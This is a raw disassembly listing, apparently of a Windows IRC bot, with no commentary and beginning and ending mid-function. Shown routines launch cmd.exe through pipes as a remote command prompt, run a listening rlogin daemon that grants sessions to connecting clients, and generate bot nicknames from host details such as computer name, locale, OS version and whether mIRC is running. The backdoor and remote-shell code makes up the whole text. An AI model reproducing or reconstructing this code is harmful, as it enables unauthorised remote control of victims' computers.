loc_40F224: ; CODE XREF: sub_40F18F+7F�j
mov [ebp+var_4], esi
loc_40F227: ; CODE XREF: sub_40F18F+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_47BF18
call ds:dword_42008C ; ReadFile
test eax, eax
jz loc_40F2F3
lea eax, [ebp+var_20C]
push eax
push offset dword_47BF1C
push dword_47BF10
call sub_40F101
add esp, 0Ch
loc_40F270: ; CODE XREF: sub_40F18F+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_47BF18
call ds:dword_42010C ; PeekNamedPipe
test eax, eax
jnz loc_40F1D7
loc_40F29E: ; CODE XREF: sub_40F18F+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_47BF1C
push dword_47BF10
call sub_40F101
push [ebp+arg_0]
call sub_412735
add esp, 10h
push 1
jmp short loc_40F315
; ---------------------------------------------------------------------------
loc_40F2C2: ; CODE XREF: sub_40F18F+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_40F227
; ---------------------------------------------------------------------------
loc_40F2CB: ; CODE XREF: sub_40F18F+6A�j
call sub_40F093
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_47BF1C
push dword_47BF10
call sub_40F101
push [ebp+arg_0]
call sub_412735
add esp, 10h
push edi
jmp short loc_40F315
; ---------------------------------------------------------------------------
loc_40F2F3: ; CODE XREF: sub_40F18F+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_47BF1C
push dword_47BF10
call sub_40F101
push [ebp+arg_0]
call sub_412735
add esp, 10h
push 0
loc_40F315: ; CODE XREF: sub_40F18F+131�j
; sub_40F18F+162�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F18F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F31C proc near ; CODE XREF: sub_408A18+4688�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_40F093
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_435808 ; SearchPathA
test eax, eax
jnz short loc_40F353
or eax, 0FFFFFFFFh
jmp loc_40F4C8
; ---------------------------------------------------------------------------
loc_40F353: ; CODE XREF: sub_40F31C+2D�j
push ebx
push edi
mov edi, ds:dword_420114
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_40F386
loc_40F37E: ; CODE XREF: sub_40F31C+7B�j
; sub_40F31C+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_40F4C6
; ---------------------------------------------------------------------------
loc_40F386: ; CODE XREF: sub_40F31C+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_40F37E
mov edi, ds:dword_4200E0
push 3
push esi
push esi
push offset dword_47BF0C
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_420110 ; DuplicateHandle
test eax, eax
jz short loc_40F37E
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 420AEAh
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz loc_40F37E
push [ebp+var_4]
mov edi, ds:dword_42003C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_47BF18, eax
mov eax, [ebp+var_8]
mov dword_47BF14, eax
mov eax, [ebp+var_2C]
mov dword_47BF50, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_47BF10, eax
jz short loc_40F452
push [ebp+arg_4]
jmp short loc_40F453
; ---------------------------------------------------------------------------
loc_40F452: ; CODE XREF: sub_40F31C+12F�j
push ebx
loc_40F453: ; CODE XREF: sub_40F31C+134�j
push offset dword_47BF1C
call sub_4145E5
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_412471
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_436688[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40F18F
push esi
push esi
call ds:dword_42000C ; CreateThread
cmp eax, esi
mov dword_436694[edi], eax
jnz short loc_40F4C4
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_4145E5
lea eax, [ebp+var_378]
push eax
call sub_401EFF
add esp, 10h
loc_40F4C4: ; CODE XREF: sub_40F31C+17F�j
xor eax, eax
loc_40F4C6: ; CODE XREF: sub_40F31C+65�j
pop edi
pop ebx
loc_40F4C8: ; CODE XREF: sub_40F31C+32�j
pop esi
leave
retn
sub_40F31C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F4CB proc near ; CODE XREF: sub_40F563+A6�p
; sub_40F563+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_40F4D2: ; CODE XREF: sub_40F4CB+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_43575C ; recv
cmp eax, 1
jnz short loc_40F508
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_40F4FD
test al, al
jnz short loc_40F4D2
xor eax, eax
inc eax
loc_40F4FA: ; CODE XREF: sub_40F4CB+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40F4FD: ; CODE XREF: sub_40F4CB+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401F73
pop ecx
loc_40F508: ; CODE XREF: sub_40F4CB+1B�j
xor eax, eax
jmp short loc_40F4FA
sub_40F4CB endp
; =============== S U B R O U T I N E =======================================
sub_40F50C proc near ; DATA XREF: sub_40F76F+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_40F50C endp
; =============== S U B R O U T I N E =======================================
sub_40F516 proc near ; CODE XREF: sub_40F563+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40F51B: ; CODE XREF: sub_40F516+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40F53D
test cl, cl
jz short loc_40F539
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40F53D
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40F51B
loc_40F539: ; CODE XREF: sub_40F516+F�j
xor eax, eax
jmp short loc_40F542
; ---------------------------------------------------------------------------
loc_40F53D: ; CODE XREF: sub_40F516+B�j
; sub_40F516+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F542: ; CODE XREF: sub_40F516+25�j
test eax, eax
pop esi
jz short loc_40F55F
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401F73
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F55F: ; CODE XREF: sub_40F516+2F�j
xor eax, eax
inc eax
retn
sub_40F516 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F563 proc near ; DATA XREF: sub_40F76F+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_43668C[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_43588C ; select
test eax, eax
jnz short loc_40F5EC
push dword_43668C[esi]
call dword_4358F4 ; closesocket
push [ebp+74h+var_208]
loc_40F5E1: ; CODE XREF: sub_40F563+1A2�j
call sub_412735
pop ecx
jmp loc_40F767
; ---------------------------------------------------------------------------
loc_40F5EC: ; CODE XREF: sub_40F563+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_43668C[esi]
call dword_43575C ; recv
push 10h
push dword_43668C[esi]
lea eax, [ebp+74h+var_2C]
call sub_40F4CB
push 10h
push dword_43668C[esi]
lea eax, [ebp+74h+var_4C]
call sub_40F4CB
push 40h
push dword_43668C[esi]
lea eax, [ebp+74h+var_F0]
call sub_40F4CB
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_43668C[esi]
mov [ebp+74h+var_4], 10h
call dword_435828 ; getpeername
test eax, eax
jz short loc_40F674
call dword_4358A0 ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401F73
push [ebp+74h+var_208]
call sub_412735
add esp, 0Ch
jmp loc_40F767
; ---------------------------------------------------------------------------
loc_40F674: ; CODE XREF: sub_40F563+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_4358D8 ; gethostbyaddr
cmp eax, ebx
jnz short loc_40F69D
push [ebp+74h+var_18]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_40F6AC
; ---------------------------------------------------------------------------
loc_40F69D: ; CODE XREF: sub_40F563+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_40F6A2: ; CODE XREF: sub_40F563+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40F6A2
loc_40F6AC: ; CODE XREF: sub_40F563+138�j
push ebx
push edi
push 420AEAh
push dword_43668C[esi]
call dword_43587C ; send
cmp dword_47BF58, ebx
jnz short loc_40F70A
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_40F516
add esp, 0Ch
test eax, eax
jnz short loc_40F70A
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_43668C[esi]
push dword ptr [esi]
call dword_43587C ; send
push dword ptr [esi]
call dword_4358F4 ; closesocket
push [ebp+74h+arg_0]
jmp loc_40F5E1
; ---------------------------------------------------------------------------
loc_40F70A: ; CODE XREF: sub_40F563+162�j
; sub_40F563+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_41094B
add esp, 10h
test eax, eax
jnz short loc_40F74A
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_412735
add esp, 0Ch
push edi
jmp short loc_40F768
; ---------------------------------------------------------------------------
loc_40F74A: ; CODE XREF: sub_40F563+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_412735
add esp, 10h
loc_40F767: ; CODE XREF: sub_40F563+84�j
; sub_40F563+10C�j
push ebx
loc_40F768: ; CODE XREF: sub_40F563+1E5�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F563 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F76F proc near ; DATA XREF: sub_408A18+4547�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_4357F8 ; WSAStartup
xor ebx, ebx
cmp eax, ebx
jz short loc_40F7C8
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401F73
push [ebp+var_50]
call sub_412735
add esp, 0Ch
loc_40F7C2: ; CODE XREF: sub_40F76F+8B�j
push esi
jmp loc_40F9E4
; ---------------------------------------------------------------------------
loc_40F7C8: ; CODE XREF: sub_40F76F+3B�j
push esi
push offset sub_40F50C
call ds:dword_420118 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_40F7FC
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401F73
pop ecx
pop ecx
call dword_435900 ; WSACleanup
push [ebp+var_50]
call sub_412735
pop ecx
jmp short loc_40F7C2
; ---------------------------------------------------------------------------
loc_40F7FC: ; CODE XREF: sub_40F76F+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_435934 ; ntohs
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4357E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40F974
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_43668C[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_4358C0 ; bind
test eax, eax
jnz loc_40F974
push 7FFFFFFFh
push [ebp+arg_0]
call dword_435908 ; listen
test eax, eax
jnz loc_40F974
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401EFF
pop ecx
mov [ebp+var_8], esi
jmp loc_40F953
; ---------------------------------------------------------------------------
loc_40F88E: ; CODE XREF: sub_40F76F+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_435804 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_40F953
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_4145E5
lea eax, [ebp+var_418]
push eax
call sub_401EFF
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_412471
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_436684[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_40F563
push ebx
lea eax, [ebp+var_14]
push eax
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz short loc_40F94E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_40F977
; ---------------------------------------------------------------------------
loc_40F946: ; CODE XREF: sub_40F76F+1E2�j
push 32h
call ds:dword_420000 ; Sleep
loc_40F94E: ; CODE XREF: sub_40F76F+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_40F946
loc_40F953: ; CODE XREF: sub_40F76F+11A�j
; sub_40F76F+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_4357AC ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_40F88E
jmp short loc_40F977
; ---------------------------------------------------------------------------
loc_40F974: ; CODE XREF: sub_40F76F+BD�j
; sub_40F76F+E3�j ...
mov esi, [ebp+arg_0]
loc_40F977: ; CODE XREF: sub_40F76F+1D5�j
; sub_40F76F+203�j
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_40F9B7
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_4056FB
add esp, 14h
loc_40F9B7: ; CODE XREF: sub_40F76F+226�j
lea eax, [ebp+var_418]
push eax
call sub_401EFF
pop ecx
push esi
call dword_4358F4 ; closesocket
push [ebp+arg_0]
call dword_4358F4 ; closesocket
call dword_435900 ; WSACleanup
push [ebp+var_50]
call sub_412735
pop ecx
push ebx
loc_40F9E4: ; CODE XREF: sub_40F76F+54�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F76F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F9EB proc near ; CODE XREF: sub_40FD06+6C�p
; DATA XREF: .data:off_42C310�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41483D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40FA44
loc_40FA1E: ; CODE XREF: sub_40F9EB+57�j
call sub_4147A1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41483D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FA1E
loc_40FA44: ; CODE XREF: sub_40F9EB+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40F9EB endp
; =============== S U B R O U T I N E =======================================
sub_40FA49 proc near ; CODE XREF: sub_408A18+3005�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
pop ecx
call sub_4147A1
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42BED4
test esi, esi
jle short loc_40FA8C
loc_40FA76: ; CODE XREF: sub_40FA49+41�j
call sub_4147A1
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40FA76
loc_40FA8C: ; CODE XREF: sub_40FA49+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40FA49 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_4200DC ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41483D
xor esi, esi
add esp, 0Ch
cmp dword_42BED4, esi
jle short loc_40FAFF
loc_40FAD9: ; CODE XREF: .text:0040FAFD�j
call sub_4147A1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41483D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FAD9
loc_40FAFF: ; CODE XREF: .text:0040FAD7�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_42011C ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41483D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40FB74
loc_40FB4E: ; CODE XREF: .text:0040FB72�j
call sub_4147A1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41483D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FB4E
loc_40FB74: ; CODE XREF: .text:0040FB4C�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 420AEAh
mov dword ptr [ebp-20h], 94h
call ds:dword_420120 ; GetVersionExA
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40FBE8
cmp dword ptr [ebp-18h], 0
jnz short loc_40FBCE
cmp dword ptr [ebp-10h], 1
jnz short loc_40FBC1
mov esi, offset a95 ; "95"
loc_40FBC1: ; CODE XREF: .text:0040FBBA�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40FC18
mov esi, offset aNt ; "NT"
jmp short loc_40FC18
; ---------------------------------------------------------------------------
loc_40FBCE: ; CODE XREF: .text:0040FBB4�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40FBDB
mov esi, offset a98 ; "98"
jmp short loc_40FC18
; ---------------------------------------------------------------------------
loc_40FBDB: ; CODE XREF: .text:0040FBD2�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40FC13
mov esi, offset aMe_0 ; "ME"
jmp short loc_40FC18
; ---------------------------------------------------------------------------
loc_40FBE8: ; CODE XREF: .text:0040FBAE�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40FC13
cmp dword ptr [ebp-18h], 0
jnz short loc_40FBFB
mov esi, offset a2k ; "2K"
jmp short loc_40FC18
; ---------------------------------------------------------------------------
loc_40FBFB: ; CODE XREF: .text:0040FBF2�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40FC08
mov esi, offset aXp_0 ; "XP"
jmp short loc_40FC18
; ---------------------------------------------------------------------------
loc_40FC08: ; CODE XREF: .text:0040FBFF�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40FC18
loc_40FC13: ; CODE XREF: .text:0040FBDF�j
; .text:0040FBEC�j
mov esi, offset a??? ; "???"
loc_40FC18: ; CODE XREF: .text:0040FBC5�j
; .text:0040FBCC�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_7 ; "[%s]"
push 1Ch
push edi
call sub_41483D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40FC5C
loc_40FC36: ; CODE XREF: .text:0040FC5A�j
call sub_4147A1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41483D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FC36
loc_40FC5C: ; CODE XREF: .text:0040FC34�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FC65 proc near ; CODE XREF: sub_40FD06+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_435840 ; FindWindowA
test esi, esi
jbe short loc_40FCB3
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40FC9C
mov eax, 420AEAh
loc_40FC9C: ; CODE XREF: sub_40FC65+30�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41483D
add esp, 14h
jmp short loc_40FCCD
; ---------------------------------------------------------------------------
loc_40FCB3: ; CODE XREF: sub_40FC65+27�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40FCC1
mov eax, 420AEAh
loc_40FCC1: ; CODE XREF: sub_40FC65+55�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_40FCCD: ; CODE XREF: sub_40FC65+4C�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_40FCD4: ; CODE XREF: sub_40FC65+74�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FCD4
sub eax, edx
cmp eax, 2
jbe short loc_40FD01
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_4144B0
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_414670
add esp, 18h
loc_40FD01: ; CODE XREF: sub_40FC65+7B�j
mov eax, [ebp+arg_0]
leave
retn
sub_40FC65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FD06 proc near ; CODE XREF: sub_40863D+53�p
; sub_4088B9+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_40FD10: ; CODE XREF: sub_40FD06+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_40FD4F
lea eax, dword_42C300[edi]
loc_40FD1D: ; CODE XREF: sub_40FD06+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_40FD3F
test cl, cl
jz short loc_40FD3B
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_40FD3F
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_40FD1D
loc_40FD3B: ; CODE XREF: sub_40FD06+21�j
xor eax, eax
jmp short loc_40FD44
; ---------------------------------------------------------------------------
loc_40FD3F: ; CODE XREF: sub_40FD06+1D�j
; sub_40FD06+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40FD44: ; CODE XREF: sub_40FD06+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_40FD5D
; ---------------------------------------------------------------------------
loc_40FD4F: ; CODE XREF: sub_40FD06+F�j
mov ecx, dword_42C30C[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40FD5D: ; CODE XREF: sub_40FD06+47�j
test eax, eax
jnz short loc_40FD6C
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_40FD10
jmp short loc_40FD7A
; ---------------------------------------------------------------------------
loc_40FD6C: ; CODE XREF: sub_40FD06+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
